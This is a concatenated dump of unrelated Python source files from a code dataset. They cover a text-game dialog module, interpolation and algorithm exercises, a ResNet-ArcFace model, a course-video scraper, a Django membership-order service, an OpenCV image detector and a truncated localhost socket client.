nicht gespeichert')\n return globals.MAP\n elif key in (ord('j'), constants.ENTER):\n globals.MAP.save_game()\n globals.MAP.log_event('Du hast das Spiel gespeichert')\n return globals.MAP\n globals.MAP.print()\n return self\n\n\nclass MonsterDialog(Dialog):\n \"\"\"\n Dialog when encountering a monster\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.initialized = False\n self.question = ''\n self.options = [\"[ENTER] OK\"]\n self.setup()\n\n def print(self):\n if not self.initialized:\n self.initialize()\n self.initialized = True\n super().print()\n\n def handle(self, key: int, previous=None):\n if key == constants.ENTER:\n self.initialized = False\n return globals.MAP\n globals.MAP.print()\n return self\n\n def initialize(self):\n player = globals.MAP.player\n monster = globals.MAP.monsters[(player.level,\n *globals.MAP.current_position)]\n\n self.question = f'Du kaempfst gegen das Monster:\\n{monster}\\n' \\\n f'Staerke: {monster.strength}'\n\n if player.strength >= monster.strength:\n self.question += '\\nUnd du besiegst es!'\n globals.MAP.log_event(f'{monster.name.title()} wurde besiegt!')\n globals.MAP.current_value = ' '\n globals.MAP.levels[player.level][globals.MAP._last_position[1]][\n globals.MAP._last_position[0]] = 'I'\n globals.MAP.items[(player.level, *globals.MAP._last_position)] = \\\n random.choice((Consumable, Equipment,\n Weapon))(player.level + 1)\n else:\n damage = int(player.strength / monster.strength * player.strength)\n self.question += '\\nUnd das Monster besiegt dich...'\n self.question += f'\\nDu hast {damage} Schaden ausgeteilt'\n globals.MAP.log_event(f'{monster.name.title()} '\n f'hat dich besiegt...')\n globals.MAP.player.damage += monster.strength - player.strength\n globals.MAP.monsters[(player.level, player.x,\n player.y)].strength -= damage\n\n globals.MAP.player.position._x, globals.MAP.player.position._y = \\\n globals.MAP.starting_positions[player.level]\n self.setup()\n\n\nclass ItemDialog(Dialog):\n\n def __init__(self):\n super().__init__()\n self.initialized = False\n self.question = ''\n self.item = None\n self.options = ['[J] Aufnehmen', '[N] Liegen lassen']\n self.setup()\n\n def print(self):\n if not self.initialized:\n self.initialize()\n self.initialized = True\n 
super().print()\n\n def handle(self, key: int, previous: 'UserInterface'):\n if key in (ord('j'), constants.ENTER):\n self.initialized = False\n globals.MAP.player.add_item(self.item)\n globals.MAP.current_value = ' '\n globals.MAP.log_event(f'Du hast {self.item} aufgenommen')\n return previous\n if key == ord('n'):\n self.initialized = False\n globals.MAP.log_event(f'Du hast {self.item} liegen lassen')\n return previous\n previous.print()\n return self\n\n def initialize(self):\n self.item = globals.MAP.items[(globals.MAP.player.level,\n *globals.MAP.current_position)]\n\n self.question = 'Du hast einen Gegenstand gefunden!\\n' \\\n f'Name: {self.item}\\n' \\\n f'Staerke: {self.item.factor}'\n self.options = ['[J] Aufnehmen', '[N] Liegen lassen']\n other_item = None\n if self.item.type == 'Kopf':\n other_item = globals.MAP.player.head\n elif self.item.type == 'Brust':\n other_item = globals.MAP.player.chest\n elif self.item.type == 'Beine':\n other_item = globals.MAP.player.legs\n elif self.item.type == 'Fuesse':\n other_item = globals.MAP.player.feet\n elif self.item.type == 'Waffe':\n other_item = globals.MAP.player.weapon\n elif self.item.type == 'Keks' and len(globals.MAP.player.cookies) > 2:\n other_item = globals.MAP.player.cookies[0]\n if other_item:\n self.question += f'\\nDu hast bereits diesen Gegenstand:\\n' \\\n f'Name: {other_item}\\n' \\\n f'Staerke: {other_item.factor}'\n self.options[0] = '[J] Austauschen'\n self.setup()\n\n\nclass GameOverDialog(Dialog):\n def __init__(self):\n super().__init__()\n self.question = 'Du bist gestorben\\nGame Over'\n self.options = ['[O] OK']\n self.setup()\n\n def handle(self, key: int, previous: 'UserInterface'):\n if key == ord('o'):\n globals.MAP = GameMap()\n return globals.MAIN\n previous.print()\n return self\n","sub_path":"src/game_map.py","file_name":"game_map.py","file_ext":"py","file_size_in_byte":24793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"73003329","text":"from functools import reduce\n\nfrom modules import utils\n\n\ndef lambda_eval(i, lst, p, flag=False):\n \"\"\" Lagrange interpolation\n return lambda(0)\n \"\"\"\n num = []\n den = []\n for element in lst:\n if element != i:\n num.append(element)\n den.append(element - i)\n\n eval_num = reduce(lambda x, y: x * y, num)\n eval_den = reduce(lambda x, y: x * y, den)\n\n if not flag:\n if eval_den < 0:\n eval_den = p - abs(eval_den)\n\n return (eval_num * utils.mult_inv(eval_den, p)) % p\n\n return eval_num * p // eval_den # p is delta\n\n\ndef reconstruct_secret(dict, p):\n sum = 0\n for node, share in dict.items():\n sum += lambda_eval(node, dict.keys(), p) * share\n\n return sum % p\n","sub_path":"modules/lagr_interpolate.py","file_name":"lagr_interpolate.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"477949135","text":"\n# Method 1: sliding-window implementation\nclass Solution:\n def lengthOfLongestSubstring(self, s):\n if not s:\n return 0\n \n left = 0\n # set() creates an unordered collection of unique elements; it supports membership tests, deduplication, and set operations such as intersection, difference and union.\n lookup = set() \n n = len(s)\n max_len = 0\n cur_len = 0\n for i in range(n):\n cur_len += 1\n while s[i] in lookup:\n lookup.remove(s[left])\n left += 1\n cur_len -= 1\n if cur_len > max_len:\n max_len = cur_len\n lookup.add(s[i])\n return max_len\n\n\n# Method 2: hash-table (dict) implementation\n# class Solution(object):\n# def lengthOfLongestSubstring(self, s):\n# \"\"\"\n# :type s: str\n# :rtype: int\n# \"\"\"\n# dic = {}\n# l, res = 0, 0\n# for r 
in range(len(s)):\n# if s[r] in dic:\n# l = max(dic[s[r]], l)\n# dic[s[r]] = r + 1\n# res = max(res, r - l + 1)\n# return res\n\n\nif __name__ == '__main__':\n sovle = Solution()\n print(sovle.lengthOfLongestSubstring('abcabcbb'))\n ","sub_path":"1-20/003-无重复字符的最长子串/3_lengthOfLongestSubstring.py","file_name":"3_lengthOfLongestSubstring.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"293659342","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 20 20:28:41 2018\n\n@author: junyang\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nfrom net_ArcFace import ArcFace\n\ndef conv3x3(in_planes, out_planes, stride=1):\n \"\"\"3x3 convolution with padding\"\"\"\n return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n\n\nclass BasicBlock(nn.Module):\n expansion = 1\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(BasicBlock, self).__init__()\n self.bn0 = nn.BatchNorm2d(inplanes,eps=1e-03) \n self.conv1 = conv3x3(inplanes, planes, 1)\n self.bn1 = nn.BatchNorm2d(planes,eps=1e-03)\n self.relu = nn.PReLU()\n self.conv2 = conv3x3(planes, planes, stride)\n self.bn2 = nn.BatchNorm2d(planes,eps=1e-03)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n out =self.bn0(x)\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n #out = self.relu(out)\n\n return out\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, inplanes, planes, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(planes,eps=1e-03)\n self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,\n padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(planes,eps=1e-03)\n self.conv3 = nn.Conv2d(planes, planes * 4, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(planes * 4,eps=1e-03)\n self.relu = nn.PReLU()\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n\n return out\n\n\nclass ResNet(nn.Module):\n\n def __init__(self, block, layers, num_classes=1000):\n self.inplanes = 64\n super(ResNet, self).__init__()\n self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,\n bias=False)\n self.bn1 = nn.BatchNorm2d(64,eps=1e-03)\n self.relu = nn.PReLU()\n #self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n self.layer1 = self._make_layer(block, 64, layers[0], stride=2)\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n self.bn2 = nn.BatchNorm2d(512,eps=1e-03)\n self.dropout = nn.Dropout2d(p=0.4, inplace=True)\n self.fc1 = nn.Linear(512 * 7 * 7, 512)\n self.bn3 = nn.BatchNorm1d(512,eps=1e-03)\n self.fc2 = ArcFace(512,num_classes)\n\n def _make_layer(self, block, planes, blocks, stride=1):\n downsample = None\n if 
stride != 1 or self.inplanes != planes * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(self.inplanes, planes * block.expansion,\n kernel_size=1, stride=stride, bias=False),\n nn.BatchNorm2d(planes * block.expansion,eps=1e-03),\n )\n\n layers = []\n layers.append(block(self.inplanes, planes, stride, downsample))\n self.inplanes = planes * block.expansion\n for i in range(1, blocks):\n layers.append(block(self.inplanes, planes))\n\n return nn.Sequential(*layers)\n\n def forward(self, x, label):\n x = self.conv1(x)\n x = self.bn1(x)\n x = self.relu(x)\n #x = self.maxpool(x)\n\n x = self.layer1(x)\n #print('layer1: ',x.size())\n x = self.layer2(x)\n #print('layer2: ',x.size())\n x = self.layer3(x)\n #print('layer3: ',x.size())\n x = self.layer4(x)\n #print('layer4: ',x.size())\n\n x = self.bn2(x)\n x = self.dropout(x)\n #print('dropout: ',x.size())\n x = x.view(x.size(0),-1)\n x = self.fc1(x)\n #print('fc1: ',x.size())\n x = self.bn3(x)\n x = self.fc2(x,label)\n #print('fc2: ',x.size())\n\n return x\n\n\n\n\ndef resnet34(**kwargs):\n \"\"\"Constructs a ResNet-34 model.\n Args:\n pretrained (bool): If True, returns a model pre-trained on ImageNet\n \"\"\"\n model = ResNet(BasicBlock, [3, 4, 6, 3], **kwargs)\n return model\n\n\"\"\"\na = resnet34()\nprint(a)\nfrom torch.autograd import Variable\nx = Variable(torch.randn(20,3,224,224))\nout = a(x)\n\"\"\"\n","sub_path":"Resnet34_test_cfp/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"349413969","text":"def sort(List):\n k=len(List)-1\n insert=k\n for i in range(len(List)-2):\n if List[i][0]List[k][0]:\n insert=i+1\n lis=List[k]\n for i in range(insert+1,len(List)):\n List[len(List)+insert-i]=List[len(List)+insert-i-1]\n List[insert]=lis\n return List\n\ndef Func(List):\n for i in range(len(List)):\n for j in range(i+1,len(List)):\n if List[i][0]<=List[j][0] and List[j][1]<=List[i][1]:\n List.remove(List[j])\n return Func(List)\n if List[j][0]<=List[i][0] and List[j][1]>=List[i][1]:\n List.remove(List[i])\n return Func(List)\n if List[i][0]<=List[j][1] and List[i][1]>=List[j][0]:\n if List[i][0] 4 or len(problem[2]) > 4:\n raise BaseException\n except:\n return \"Error: Numbers cannot be more than four digits.\"\n\n #Check if operator is valid\n try:\n if problem[1] != '+' and problem[1] != '-':\n raise BaseException\n except:\n return \"Error: Operator must be '+' or '-'.\"\n\n #Return True if data is validated\n return True\n\ndef arithmetic_arranger(problems, showAnswer=False):\n arranged_problems = 0\n line1=line2=line3=line4 = \"\"\n problem_gap = \" \" * 4 \n #Check Problem Count\n try:\n if len(problems) > 5:\n raise BaseException\n except:\n return \"Error: Too many problems.\"\n\n #Handle each problem\n for problem in problems:\n part = problem.split()\n #Validate problems\n valid = validate_data(part)\n if valid != True:\n return valid\n\n #Arrange Problems \n space = max(len(part[0]),len(part[2])) + 2\n if len(line1) > 0:\n line1 += problem_gap\n line2 += problem_gap\n line3 += problem_gap\n\n line1 += part[0].rjust(space)\n line2 += part[1] + part[2].rjust(space-1)\n line3 += '-' * (space)\n\n #If showAnswer is true\n if showAnswer:\n #Perform math\n if part[1] == '+':\n solution = int(part[0]) + int(part[2])\n else:\n solution = int(part[0]) - int(part[2])\n \n if len(line4) > 0:\n line4 += problem_gap\n line4 += str(solution).rjust(space)\n\n #Return Arranged Problems\n arranged_problems = 
f\"{line1}\\n{line2}\\n{line3}\"\n if showAnswer:\n arranged_problems += f\"\\n{line4}\"\n return arranged_problems","sub_path":"arithmetic_arranger.py","file_name":"arithmetic_arranger.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"536997664","text":"# class Linyu(object):\n#\n# hobby = 'mmp'\n#\n# def __init__(self, name, age, weight):\n# self.name = name\n# self._age = age\n# self.__weight = weight\n#\n#\n# @classmethod# called via the class name, not a specific instance\n# def get_hobby(cls):\n# return cls.hobby\n#\n#\n# @property # call the method as if accessing an attribute\n# def get_weight(self):\n# return self.__weight\n#\n#\n# def self_intro(self):\n# print('My name is %s \\n I am %s years old \\n' % (self.name, self._age))\n#\n#\n#\n#\n# if __name__ == '__main__':\n# linyu = Linyu('石世伟', '20', '65')\n# print(dir(linyu))\n# print(linyu.get_hobby())\n# print(linyu.get_weight)\n# linyu.self_intro()\n# encoding:utf-8\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nfrom multiprocessing.pool import Pool\n\n\nclass MaiZi():\n def __init__(self):\n self.url = 'http://www.maiziedu.com/course/957/ '\n\n # function that parses the urls\n def parse_next_url(self):\n request = requests.get(self.url)\n request.encoding = request.apparent_encoding\n for url in BeautifulSoup(request.text, 'lxml').select('ul.lesson-lists li a'):\n next_url = 'http://www.maiziedu.com/ ' + url['href']\n yield next_url\n\n # parse the content url\n def parse_content(self, url):\n request = requests.get(url)\n request.encoding = request.apparent_encoding\n demo = '\\$lessonUrl = \"(.*?)\"'\n de = re.compile(demo, re.S)\n url_next = de.findall(request.text)[0]\n content = requests.get(url_next).content\n title = BeautifulSoup(request.text, 'lxml').select('span.selected')[0]['name']\n print(title)\n with open('D:\\\\' + title + '.mp4', 'wb') as e:\n e.write(content)\n\n # thread pool\n def parse_pool(self):\n pool = Pool(2)\n pool.map(self.parse_content, self.parse_next_url())\n\n\nif __name__ == '__main__':\n Run = MaiZi()\n Run.parse_pool()\n","sub_path":"5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"494540410","text":"import collections\nfrom datetime import datetime, timedelta\nfrom decimal import Decimal\nfrom django.core.cache import cache\n\nfrom django.conf import settings\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\nfrom django.db.models import Prefetch\n\nfrom upday.models import StudentAssociatorShip, Associator, AssociatorOrder, UserCard, AssociatorEntry, Project, Coupon, \\\n StudentCouponShip, PunchRecord\nfrom upday.modules.channel.service.project_channel_service import ProjectChannelService\nfrom upday.modules.common.service.cache_service import key_handler\nfrom upday.modules.common.service.datetime_service import DatetimeService\nfrom upday.modules.common.service.encrypt_service import EncryptService\nfrom upday.modules.common.service.file_service import FileService\nfrom upday.modules.common.service.url_service import UrlService\nfrom upday.modules.tasker.rule import scheduler\nfrom upday.modules.wechat.service.message_service import MessageService\nfrom upday.modules.wechat.service.order_service import OrderService\nfrom upday.modules.channel.service.channel_service import ChannelService\n\n\nclass AssociatorService:\n\n def create(self, team):\n associator = Associator(\n team=team\n )\n associator.save()\n return associator\n\n def 
bind(self, student, associator):\n try:\n ship = StudentAssociatorShip.objects.get(student=student, associator=associator)\n except MultipleObjectsReturned:\n return False\n except ObjectDoesNotExist:\n ship = StudentAssociatorShip(student=student, associator=associator)\n ship.save()\n ship.exit_time = ship.join_time + timedelta(days=365)\n ship.save()\n return True\n # 学生是否曾参加会员但已过期失效\n if AssociatorService().is_expired_ship(ship):\n now = DatetimeService.now()\n ship.join_time = now\n ship.exit_time = now + timedelta(days=365)\n ship.save()\n return True\n ship_id = StudentAssociatorShip.objects.filter(student=student, associator=associator)[0].id\n ship_id = EncryptService().encrypt_id('HASH_KEY_STUDENT_ASSOCIATOR_ID', ship_id)\n msg = 'The StudentAssociatorShip is existed, id: ' + str(ship_id)\n raise Exception(msg)\n\n def get_student_usercard_set(self, student):\n # 取出该学生已参加的所有会员项目,预加载出项目、punchrecord_list(按两种不同的条件取出,并起了别名all_punchrecord_list和finished_punchrecord_list,set变成了list)\n my_project_list = []\n usercard_set = student.usercard_set.filter(status=1).select_related('project').prefetch_related(\n Prefetch('punchrecord_set', to_attr='all_punchrecord_list'),\n Prefetch('punchrecord_set', queryset=PunchRecord.objects.exclude(status=0), to_attr='finished_punchrecord_list'))\n for usercard in usercard_set:\n my_project_list.append(usercard.project)\n return my_project_list, usercard_set\n\n def get_final_url_from_entry(self, is_associator, entry, my_project_list, usercard_set):\n # 若学生没参加会员,url传空字符串\n if is_associator == 0:\n url = ''\n has_joined = 0\n return url, has_joined\n # 若学生参加了会员,无论是否过期,都返回条目详情。\n # 若条目绑定了project,传project的url;若无,传link;若都无,传空字符串。\n current_project = entry.project\n if current_project:\n url = ChannelService.get_common_channel_link('', EncryptService().encrypt_id('HASH_KEY_PROJECT_ID',\n current_project.id))\n if current_project in my_project_list:\n has_joined = 1\n user_card = usercard_set.get(project=entry.project)\n punch_day = len(user_card.all_punchrecord_list)\n real_punch_day = len(user_card.finished_punchrecord_list)\n if punch_day == real_punch_day:\n has_joined = 2\n else:\n has_joined = 0\n return url, has_joined\n entry_link = entry.link\n if entry_link != '':\n url = entry_link\n has_joined = 0\n return url, has_joined\n return '', 0\n\n def get_associator_entry_list(self, associator_album, is_associator, my_project_list, usercard_set):\n associator_entry_list = []\n # 取出会员专辑内所有项目\n for associator_entry in associator_album.associatorentry_set.select_related('project').order_by('position'):\n picture = FileService().sign_url(associator_entry.picture)\n url, has_joined = self.get_final_url_from_entry(\n is_associator=is_associator,\n entry=associator_entry,\n my_project_list=my_project_list,\n usercard_set=usercard_set,\n )\n dict = {\n 'url': url,\n 'has_joined': has_joined,\n 'name': associator_entry.name,\n 'price': associator_entry.price,\n 'picture': picture,\n 'introduce': associator_entry.introduce,\n }\n associator_entry_list.append(dict)\n return associator_entry_list\n\n # 根据name查询会员是否存在\n def is_existed(self, name):\n return Associator.objects.filter(name=name).count() > 0\n\n def send_bind_associator_message(self, name, time_end, associator_id, openid):\n # 延时发消息\n scheduler.event_bound_associator(openid, associator_id)\n encrypt_handler = EncryptService()\n associator_id = encrypt_handler.encrypt_id('HASH_KEY_ASSOCIATOR_ID', associator_id)\n url = ChannelService().get_associator_link(associator_id)\n message_handler = 
MessageService()\n # 获取模板信息\n template_data, template_id = message_handler.get_bind_associator_template(name, time_end)\n # 发送模板消息\n message_handler.send_template(user_id=openid, template_id=template_id,\n data=template_data, url=url)\n\n # 更新会员信息\n def update_associator(self, validated_data):\n associator = validated_data['associator']\n associator.name = validated_data['name']\n associator.present_price = validated_data['present_price']\n associator.origin_price = validated_data['origin_price']\n if validated_data['picture']:\n associator.picture = validated_data['picture']\n if validated_data['voice']:\n associator.voice = validated_data['voice']\n if validated_data['qrcode']:\n associator.qrcode = validated_data['qrcode']\n if validated_data['benefit']:\n associator.benefit = validated_data['benefit']\n if validated_data['introduction']:\n associator.introduction = validated_data['introduction']\n if validated_data['training']:\n associator.training = validated_data['training']\n associator.save()\n key = key_handler.get_real_associator_detail_key(associator.id)\n cache.delete(key)\n key = key_handler.get_fake_associator_detail_key(associator.id)\n cache.delete(key)\n return associator\n\n # 查询某种特定会员ID的学生数量\n def count_join_num(self, associator):\n return StudentAssociatorShip.objects.filter(associator=associator).count()\n\n # 删除会员(注意:已经有人报名的会员不能通过此接口删除)\n def delete_associator(self, associator):\n if associator.students.count() >= 1:\n msg = 'Warning! There are some students join this associator, you can not delete it'\n raise Exception(msg)\n else:\n associator.delete()\n\n # 查询团队中的会员列表\n def find_all_associator(self, team):\n associator_set = Associator.objects.filter(team=team).order_by('-create_time')\n return associator_set\n\n def get_associator(self, validated_data):\n instance = Associator.objects.get(id=validated_data['associator_id'])\n return instance\n\n def is_order_exists(self, out_trade_no, openid, total_fee, trade_type):\n try:\n order = AssociatorOrder.objects.get(out_trade_no=out_trade_no, pay_status=0)\n except MultipleObjectsReturned:\n return False\n except ObjectDoesNotExist:\n return False\n return order\n # if order.student.openid == openid and int(order.total_fee * 100) == int(\n # total_fee) and order.trade_type == trade_type:\n # return order\n # else:\n # return False\n\n def get_associator_list(self, student):\n \"\"\"\n 为什么先算学生的会员,自己慢慢体会\n :param student:\n :return:\n \"\"\"\n return student.associator_set.prefetch_related('associatoralbum_set__associatorentry_set')\n\n def complete_order(self, order, transaction_id, time_end, is_subscribe, bank_type, settlement_total_fee, fee_type):\n order.transaction_id = transaction_id\n order.time_end = time_end\n order.is_subscribe = is_subscribe\n order.bank_type = bank_type\n order.settlement_total_fee = settlement_total_fee\n order.fee_type = fee_type\n order.pay_status = 1\n order.save()\n return True\n\n # 解绑通过会员免费报名的项目\n def unbind_project(self, project_list, student, time_end):\n \"\"\"\n :param upday_id: 所有的orion_upday_item_id\n :param uid:\n :param time_end: AssociatorOrder表里的time_end(支付完成时间)时间戳,为防止将购买会员之前就已经购买的项目也\\\n 删除掉,通过时间筛选掉这部分,只将参加会员后的会员项目解绑。\n :return:\n \"\"\"\n for project in project_list:\n target_card = UserCard.objects.filter(project=project, create_at__gt=time_end, student=student)\n target_card.update(status=0)\n pass\n\n def clear_associator_detail_cache(self, associator):\n key = key_handler.get_real_associator_detail_key(associator.id)\n cache.delete(key)\n key = 
key_handler.get_fake_associator_detail_key(associator.id)\n cache.delete(key)\n\n def is_expired_ship(self, ship):\n # 会员的失效时间\n # expire_time_stamp = DatetimeService.get_timestamp_from_utc_datetime(expire_time)\n # 会员是否已过期失效\n # now_stamp = DatetimeService.get_current_timestamp()\n if ship.exit_time < DatetimeService.now():\n return True\n else:\n return False\n\n def is_associator_expired(self, associator, student):\n try:\n student_associator_ship = StudentAssociatorShip.objects.get(associator=associator, student=student)\n except ObjectDoesNotExist:\n msg = {'result': 'No such a student_associator_ship'}\n raise Exception(msg, code='validation')\n except MultipleObjectsReturned:\n msg = {'result': 'Multiple student_associator_ship'}\n raise Exception(msg, code='validation')\n return self.is_expired_ship(student_associator_ship)\n\n def get_joined_associator_list(self, student_associator_ship_set):\n associator_list = []\n for ship in student_associator_ship_set:\n dict = {\n 'associator_id': EncryptService().encrypt_id('HASH_KEY_ASSOCIATOR_ID', ship.associator.id),\n 'name': ship.associator.name\n }\n associator_list.append(dict)\n return associator_list\n\n #################################################################################\n # 以下为生成商户订单功能\n #################################################################################\n\n # 商户订单的out_trade_no\n def create_out_trade_no(self):\n order_service_handler = OrderService()\n return order_service_handler.generate_out_trade_no()\n\n # 商户订单中的商品描述\n def create_body(self, associator):\n name = associator.name\n price = associator.present_price\n body = \"\"\"声德:{associator_name}(¥{associator_price})\"\"\".format(\n associator_name=name,\n associator_price=price\n )\n return body\n\n # 获得回调url\n def get_wechat_pay_notify_url(self):\n return 'https://' + settings.OPEN_UPDAY_DOMAIN + '/media-platform/associator/pay-callback'\n # return 'http://milk345.imwork.net:45992/api/associator/pay-callback'\n\n # 生成ip\n def get_client_ip(self, request):\n try:\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n except Exception:\n ip = '0.0.0.0'\n return ip\n\n # 下载订单Excel\n def generate_order_excel(self, order_list):\n matrix = []\n for order_info in order_list:\n translated_info = collections.OrderedDict()\n order_id = order_info['order_id']\n associator_id = order_info['associator_id']\n user_id = order_info['user_id']\n nickname = order_info['nickname']\n associator_name = order_info['associator_name']\n total_fee = order_info['total_fee']\n refund_status = order_info['refund_status']\n refund_time = order_info['refund_time']\n time_end = order_info['time_end']\n if refund_time:\n refund_time = DatetimeService.get_represent_from_timestamp(refund_time)\n else:\n refund_time = ''\n if time_end:\n time_end = DatetimeService.get_represent_from_timestamp(time_end)\n else:\n time_end = ''\n channel = order_info['channel']\n refund_operator = order_info['refund_operator']\n refund_reason = order_info['refund_reason']\n translated_info['订单号'] = order_id\n translated_info['会员ID'] = associator_id\n translated_info['用户ID'] = user_id\n translated_info['用户昵称'] = nickname\n translated_info['会员身份'] = associator_name\n translated_info['订单金额'] = total_fee\n translated_info['退款状态'] = refund_status\n translated_info['退款时间'] = refund_time\n translated_info['支付时间'] = time_end\n translated_info['报名渠道'] = channel\n translated_info['退款人'] = 
refund_operator\n translated_info['退款原因'] = refund_reason\n matrix.append(translated_info)\n file_handler = FileService()\n return file_handler.create_downloadable_excel(matrix)\n\n # 按照特定的昵称,会员身份,订单金额等条件去查询\n def search_order(self, order_set, nickname, associator_name, total_fee, refund_status, refund_time_scope,\n pay_time_scope, channel, refund_operator):\n if nickname:\n order_set = self.search_order_by_nickname(order_set, nickname)\n if associator_name:\n order_set = self.search_order_by_associator_name(order_set, associator_name)\n if total_fee:\n order_set = self.search_order_by_total_fee(order_set, total_fee)\n if pay_time_scope:\n order_set = self.search_order_by_pay_time(order_set, pay_time_scope)\n if channel:\n order_set = self.search_order_by_channel(order_set, channel)\n if refund_operator:\n order_set = self.search_order_by_operator(order_set, refund_operator)\n if refund_status == 1:\n order_set = self.search_order_by_refund_status(order_set, refund_status)\n if refund_time_scope:\n order_set = self.search_order_by_refund_time(order_set, refund_time_scope)\n if refund_status == 0:\n order_set = self.search_order_by_refund_status(order_set, refund_status)\n\n return order_set\n\n def search_order_by_nickname(self, original_order_set, nickname):\n return original_order_set.filter(student__nickname=nickname)\n\n def search_order_by_associator_name(self, original_order_set, associator_name):\n return original_order_set.filter(associator__name=associator_name)\n\n def search_order_by_total_fee(self, original_order_set, total_fee):\n return original_order_set.filter(total_fee=total_fee)\n\n def search_order_by_refund_status(self, original_order_set, refund_status):\n return original_order_set.filter(refund_status=refund_status)\n\n def search_order_by_channel(self, original_order_set, channel):\n return original_order_set.filter(channel__mark=channel)\n\n def search_order_by_operator(self, original_order_set, refund_operator):\n return original_order_set.filter(refund_operator__username=refund_operator)\n\n def search_order_by_refund_time(self, original_order_set, refund_time_scope):\n return original_order_set.filter(refund_time__range=(refund_time_scope[0], refund_time_scope[1]))\n\n def search_order_by_pay_time(self, original_order_set, pay_time_scope):\n return original_order_set.filter(time_end__range=(pay_time_scope[0], pay_time_scope[1]))\n","sub_path":"upday/modules/associator/service/associator_service.py","file_name":"associator_service.py","file_ext":"py","file_size_in_byte":17640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"366133998","text":"__author__ = 'KolesnikG'\n\nimport numpy as np\nimport cv2\n\nname=str(input('Enter the file name: '))\nimg = cv2.imread(name)\nindex=name.find('.jpg')\nname=name[:index]+'(binRes)'+'.jpg'\n\n\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\ngray_blur = cv2.GaussianBlur(gray, (15, 15), 0)\nret, thresh = cv2.threshold(gray_blur,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\nkernel = np.ones((3, 3), np.uint8)\nclosing = cv2.morphologyEx(thresh, cv2.MORPH_GRADIENT, kernel, iterations=1)\ncont_img=closing.copy()\nimage, contours, hierarchy = cv2.findContours(cont_img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\nprint('All contours:',len(contours))\n\n\ndef getCount(cnt):\n count=[]\n for c in contours:\n area = cv2.contourArea(c)\n if area < 700 or area > 1000000:\n continue\n else:\n count+=[c]\n return count\nprint('After calibration:',len(getCount(contours)))\n\ndef 
getMask(cnt, i):\n mask = np.zeros_like(thresh)\n cv2.drawContours(mask, cnt,i, 255, -1)\n out = np.zeros_like(thresh)\n out[mask == 255] = thresh[mask == 255]\n return out\n\ndef getContourImage(cnt,i):\n box=np.int0(cv2.boxPoints(cv2.minAreaRect(cnt[i])))\n x=box[0][0];y=box[1][1]\n w=box[3][0];h=box[0][1]\n\n z=getMask(cnt,i)[y:h,x:w]\n\n if z.size==0:\n return False\n elif cv2.countNonZero(z)/z.size<0.2:\n return False\n else:\n print('Rectangle','x:',x,', y:',y,', w:',w,', h:',h)\n return True\n\nc=getCount(contours)\nfor i in range(0,len(c)):\n if getContourImage(c,i)==True:\n ell = cv2.fitEllipse(c[i])\n cv2.ellipse(img, ell, (0,255,0), 2)\n box=np.int0(cv2.boxPoints(cv2.minAreaRect(c[i])))\n cv2.drawContours(img,[box],0,(0,0,255),1)\n\ncv2.imwrite(name,img)\nprint('Image was saved in program folder(dest) with name:',name)","sub_path":"detection/dark_areas2.0.py","file_name":"dark_areas2.0.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"300457631","text":"import socket\nimport sqlite3\nimport time\nimport json\nimport sys\n\nHOST = '127.0.0.1'\nPORT = 5000\nBUFFER_SIZE = 8192\n\ndef get_data(s, BUFFER_SIZE):\n data = b''\n while True:\n part = s.recv(BUFFER_SIZE)\n data += part\n if len(part) < 